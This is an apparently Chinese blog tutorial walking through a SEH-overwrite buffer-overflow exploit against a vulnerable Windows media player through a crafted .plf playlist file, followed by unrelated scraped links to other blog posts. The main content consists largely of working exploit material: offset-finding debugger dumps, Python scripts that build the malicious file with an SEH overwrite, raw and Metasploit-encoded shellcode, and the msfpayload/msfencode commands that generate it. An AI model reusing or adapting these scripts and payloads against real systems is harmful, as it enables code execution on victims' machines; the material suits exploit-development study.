daniel@daniel-mint ~/msf/metasploit-framework/tools $ ruby pattern_create.rb 2000

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co

生成定位pattern

根据pattern查找位置

0:000> db poi(fs:0)

0012f2c8  32 41 75 33 41 75 34 41-75 35 41 75 36 41 75 37  2Au3Au4Au5Au6Au7

0012f2d8  41 75 38 41 75 39 41 76-30 41 76 31 41 76 32 41  Au8Au9Av0Av1Av2A

0012f2e8  76 33 41 76 34 41 76 35-41 76 36 41 76 37 41 76  v3Av4Av5Av6Av7Av

0012f2f8  38 41 76 39 41 77 30 41-77 31 41 77 32 41 77 33  8Av9Aw0Aw1Aw2Aw3

0012f308  41 77 34 41 77 35 41 77-36 41 77 37 41 77 38 41  Aw4Aw5Aw6Aw7Aw8A

0012f318  77 39 41 78 30 41 78 31-41 78 32 41 78 33 41 78  w9Ax0Ax1Ax2Ax3Ax

0012f328  34 41 78 35 41 78 36 41-78 37 41 78 38 41 78 39  4Ax5Ax6Ax7Ax8Ax9

0012f338  41 79 30 41 79 31 41 79-32 41 79 33 41 79 34 41  Ay0Ay1Ay2Ay3Ay4A

  

Prelude> zip [1..100] ['a'..'z']

[(1,'a'),(2,'b'),(3,'c'),(4,'d'),(5,'e'),(6,'f'),(7,'g'),(8,'h'),(9,'i'),(10,'j'),(11,'k'),(12,'l'),(13,'m'),(14,'n'),(15,'o'),(16,'p'),(17,'q'),(18,'r'),(19,'s'),(20,'t'),(21,'u'),(22,'v'),(23,'w'),(24,'x'),(25,'y'),(26,'z')]

  

因此Au3-Aa0 = [u-a] * 10 + [3 - 0 ] = (21 - 1) * 10 + 3 = 203,即Au3是第203个三元组

所以2Au3是在203*3 = 609偏移处

或者

At9-Aa0 = [t - a + 1] * 10 = 200组,占据了600个字节,

Au0Au1Au2Au3

Prelude> zip [601..700] ['A','u','0','A','u','1','A','u','2','A','u','3']

[(601,'A'),(602,'u'),(603,'0'),(604,'A'),(605,'u'),(606,'1'),(607,'A'),(608,'u'),(609,'2'),(610,'A'),(611,'u'),(612,'3')]

  

因此是609偏移,或者说占据了609-612这四个字节。

参考:http://www.fuzzysecurity.com/tutorials/expDev/3.html

filename="evil.plf"

buffer = "A"*608 + "B"*4 + "C"*4 + "D"*(2000 - 608 - 8 - 8)

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

  

0:000> dd poi(fs:0)

0012f2c8  42424242 43434343 44444444 44444444

0012f2d8  44444444 44444444 44444444 44444444

0012f2e8  44444444 44444444 44444444 44444444

0012f2f8  44444444 44444444 44444444 44444444

0012f308  44444444 44444444 44444444 44444444

0012f318  44444444 44444444 44444444 44444444

0012f328  44444444 44444444 44444444 44444444

0012f338  44444444 44444444 44444444 44444444

  

filename="evil1.plf"

buf = "A"*608 + "\xeb\x06\x90\x90" + "\xb6\xf7\x47\x00"

buf += "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"

buf += "\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"

buf += "\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"

buf += "\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b"

buf += "\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0"

buf += "\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b"

buf += "\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01"

buf += "\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2"

buf += "\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"

buf += "\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"

buf += "\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86"

buf += "\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68\x31\x8b"

buf += "\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd"

buf += "\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"

buf += "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"

buf += "\x2e\x65\x78\x65\x00"

buf += "D"*(2000 - 608 - 8 - 8 - 200)

textfile = open(filename , 'w')

textfile.write(buf)

textfile.close()

  

这种方式,并没有exploit成功,原因是shellcode中不能有\x00,这会使字符串截止,而且msfpayload生成的payload中也包含\x00,也无法使用。

因此需要使用msfencode进行加密,

daniel@daniel-mint ~/msf/metasploit-framework $ ruby msfpayload windows/exec CMD=calc.exe R | ruby msfencode -b '\x00\x0d\x0a\x1a' -t python -e x86/call4_dword_xor

WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1

[*] x86/call4_dword_xor succeeded with size 224 (iteration=1)

buf =  ""

buf += "\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81"

buf += "\x76\x0e\xdc\x84\x22\x40\x83\xee\xfc\xe2\xf4\x20\x6c"

buf += "\xab\x40\xdc\x84\x42\xc9\x39\xb5\xf0\x24\x57\xd6\x12"

buf += "\xcb\x8e\x88\xa9\x12\xc8\x0f\x50\x68\xd3\x33\x68\x66"

buf += "\xed\x7b\x13\x80\x70\xb8\x43\x3c\xde\xa8\x02\x81\x13"

buf += "\x89\x23\x87\x3e\x74\x70\x17\x57\xd6\x32\xcb\x9e\xb8"

buf += "\x23\x90\x57\xc4\x5a\xc5\x1c\xf0\x68\x41\x0c\xd4\xa9"

buf += "\x08\xc4\x0f\x7a\x60\xdd\x57\xc1\x7c\x95\x0f\x16\xcb"

buf += "\xdd\x52\x13\xbf\xed\x44\x8e\x81\x13\x89\x23\x87\xe4"

buf += "\x64\x57\xb4\xdf\xf9\xda\x7b\xa1\xa0\x57\xa2\x84\x0f"

buf += "\x7a\x64\xdd\x57\x44\xcb\xd0\xcf\xa9\x18\xc0\x85\xf1"

buf += "\xcb\xd8\x0f\x23\x90\x55\xc0\x06\x64\x87\xdf\x43\x19"

buf += "\x86\xd5\xdd\xa0\x84\xdb\x78\xcb\xce\x6f\xa4\x1d\xb6"

buf += "\x85\xaf\xc5\x65\x84\x22\x40\x8c\xec\x13\xcb\xb3\x03"

buf += "\xdd\x95\x67\x74\x97\xe2\x8a\xec\x84\xd5\x61\x19\xdd"

buf += "\x95\xe0\x82\x5e\x4a\x5c\x7f\xc2\x35\xd9\x3f\x65\x53"

buf += "\xae\xeb\x48\x40\x8f\x7b\xf7\x23\xbd\xe8\x41\x6e\xb9"

buf += "\xfc\x47\x40"

  

然后写入shellcode

filename="evil1.plf"

buf = "A"*608 + "\xeb\x06\x90\x90" + "\xed\x7a\x03\x64"

buf += "\x90"*20

buf += "\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81"

buf += "\x76\x0e\xdc\x84\x22\x40\x83\xee\xfc\xe2\xf4\x20\x6c"

buf += "\xab\x40\xdc\x84\x42\xc9\x39\xb5\xf0\x24\x57\xd6\x12"

buf += "\xcb\x8e\x88\xa9\x12\xc8\x0f\x50\x68\xd3\x33\x68\x66"

buf += "\xed\x7b\x13\x80\x70\xb8\x43\x3c\xde\xa8\x02\x81\x13"

buf += "\x89\x23\x87\x3e\x74\x70\x17\x57\xd6\x32\xcb\x9e\xb8"

buf += "\x23\x90\x57\xc4\x5a\xc5\x1c\xf0\x68\x41\x0c\xd4\xa9"

buf += "\x08\xc4\x0f\x7a\x60\xdd\x57\xc1\x7c\x95\x0f\x16\xcb"

buf += "\xdd\x52\x13\xbf\xed\x44\x8e\x81\x13\x89\x23\x87\xe4"

buf += "\x64\x57\xb4\xdf\xf9\xda\x7b\xa1\xa0\x57\xa2\x84\x0f"

buf += "\x7a\x64\xdd\x57\x44\xcb\xd0\xcf\xa9\x18\xc0\x85\xf1"

buf += "\xcb\xd8\x0f\x23\x90\x55\xc0\x06\x64\x87\xdf\x43\x19"

buf += "\x86\xd5\xdd\xa0\x84\xdb\x78\xcb\xce\x6f\xa4\x1d\xb6"

buf += "\x85\xaf\xc5\x65\x84\x22\x40\x8c\xec\x13\xcb\xb3\x03"

buf += "\xdd\x95\x67\x74\x97\xe2\x8a\xec\x84\xd5\x61\x19\xdd"

buf += "\x95\xe0\x82\x5e\x4a\x5c\x7f\xc2\x35\xd9\x3f\x65\x53"

buf += "\xae\xeb\x48\x40\x8f\x7b\xf7\x23\xbd\xe8\x41\x6e\xb9"

buf += "\xfc\x47\x40"

buf += "D"*(2000 - 608 - 8 - 8 - 224-20)

textfile = open(filename , 'w')

textfile.write(buf)

textfile.close()

  

用下面平台测试,exploit成功。

Exploit Development: Backtrack 5
Debugging Machine: Windows XP PRO SP3
Vulnerable Software: Download

find pattern的更多相关文章

  1. 按照Enterprise Integration Pattern搭建服务系统

    在前一篇文章中,我们已经对Enterprise Integration Pattern中所包含的各个组成进行了简单地介绍.限于篇幅(20页Word以内),我并没有深入地讨论各个组成.但是如果要真正地按 ...

  2. Enterprise Integration Pattern - 组成简介

    近些年来,越来越多的Web应用正在逐渐向大型化的方向发展.它们通常都会包含一系列相互协作的子服务.在开发过程中,如何让这些子服务协同工作常常是软件开发人员所最为头疼的问题,如各个子服务之间的数据表示不 ...

  3. 设计模式(十二):通过ATM取款机来认识“状态模式”(State Pattern)

    说到状态模式,如果你看过之前发布的重构系列的文章中的<代码重构(六):代码重构完整案例>这篇博客的话,那么你应该对“状态模式”并不陌生,因为我们之前使用到了状态模式进行重构.上一篇博客我们 ...

  4. 设计模式(十一):从文Finder中认识"组合模式"(Composite Pattern)

    上一篇博客中我们从从电影院中认识了"迭代器模式"(Iterator Pattern),今天我们就从文件系统中来认识一下“组合模式”(Composite Pattern).说到组合模 ...

  5. 设计模式(十):从电影院中认识"迭代器模式"(Iterator Pattern)

    上篇博客我们从醋溜土豆丝与清炒苦瓜中认识了“模板方法模式”,那么在今天这篇博客中我们要从电影院中来认识"迭代器模式"(Iterator Pattern).“迭代器模式”顾名思义就是 ...

  6. 设计模式(九): 从醋溜土豆丝和清炒苦瓜中来学习"模板方法模式"(Template Method Pattern)

    今天是五.四青年节,祝大家节日快乐.看着今天这标题就有食欲,夏天到了,醋溜土豆丝和清炒苦瓜适合夏天吃,好吃不上火.这两道菜大部分人都应该吃过,特别是醋溜土豆丝,作为“鲁菜”的代表作之一更是为大众所熟知 ...

  7. 设计模式(八): 从“小弟”中来类比"外观模式"(Facade Pattern)

    在此先容我拿“小弟”这个词来扯一下淡.什么是小弟呢,所谓小弟就是可以帮你做一些琐碎的事情,在此我们就拿“小弟”来类比“外观模式”.在上面一篇博文我们完整的介绍了“适配器模式”,接下来我们将要在这篇博客 ...

  8. 设计模式(七): 通过转接头来观察"适配器模式"(Adapter Pattern)

    在前面一篇博客中介绍了“命令模式”(Command Pattern),今天博客的主题是“适配器模式”(Adapter Pattern).适配器模式用处还是比较多的,如果你对“适配器模式”理解呢,那么自 ...

  9. 设计模式(三):“花瓶+鲜花”中的装饰者模式(Decorator Pattern)

    在前两篇博客中详细的介绍了"策略模式"和“观察者模式”,今天我们就通过花瓶与鲜花的例子来类比一下“装饰模式”(Decorator Pattern).在“装饰模式”中很好的提现了开放 ...

  10. 设计模式(一):“穿越火线”中的“策略模式”(Strategy Pattern)

    在前段时间呢陆陆续续的更新了一系列关于重构的文章.在重构我们既有的代码时,往往会用到设计模式.在之前重构系列的博客中,我们在重构时用到了“工厂模式”.“策略模式”.“状态模式”等.当然在重构时,有的地 ...

随机推荐

  1. ExecutorException: A query was run and no Result Maps were found for the Mapped Statement ‘com.win.mall.dao.CartMapper.test’. It’s likely that neither a Result Type nor a Result Map was specified.

    ExecutorException: A query was run and no Result Maps were found for the Mapped Statement 'com.win.m ...

  2. Oracle 11g 概述

    始于:1970.6月份的一篇论文,IBM研究员埃德加‘考特<大型共享数据库的关系模型>(也是转折点)1977.6月Larry Ellison Bob Miner Ed Oates创办了“软 ...

  3. POJ 1410 Intersection (计算几何)

    题目链接:POJ 1410 Description You are to write a program that has to decide whether a given line segment ...

  4. selenium快捷键操作

    常用的键盘操作 send_keys(Keys.BACK_SPACE) 删除键(BackSpace) send_keys(Keys.SPACE) 空格键(Space) send_keys(Keys.TA ...

  5. HDU3951_Coin Game

    Coin Game Problem Description 一堆n个硬币围成一圈,两个人轮流拿走连续k个硬币,拿走最后一堆的人获胜 问你第一个人获胜还是第二个 思路: 这是NIM游戏改编版本 但是道理 ...

  6. qt ui界面控件布局设计

    1.布局控件简介: 水平布局,里面的控件将水平展示,布局器里面的控件大小若没有固定,其大小将随着布局的大小而自动拉伸.可以通过设置其左(layoutLeftMargin).上(layoutTopMar ...

  7. centos 7 设置开机启动脚本

    vi /etc/rc.d/rc.local 在末尾追加 sh脚本 sh脚本要提前赋予执行权限 下面是测试,开机同步北京时间 [root@commonTest bin]# vi /usr/local/b ...

  8. 讲真,下次打死我也不敢随便改serialVersionUID了

    讲真,下次打死我也不敢随便改serialVersionUID了 码农沉思录 码农沉思录 微信号 code-thinker 功能介绍 笔者为国内某知名企业不知名码农,专注Java Web领域多年,有丰富 ...

  9. js五种基本数据类型:string, number, boolean, null, undefined

    /** * 五种基本数据类型:string, number, boolean, null, undefined */ // undefined // 声明变量foo,未声明变量bar var foo; ...

  10. 【牛客网-剑指offer】矩形覆盖

    题目: 我们可以用21的小矩形横着或者竖着去覆盖更大的矩形.请问用n个21的小矩形无重叠地覆盖一个2*n的大矩形,总共有多少种方法? 分析: 假设2为高,n为宽 因为高为2固定,会出现固定情况,即无论 ...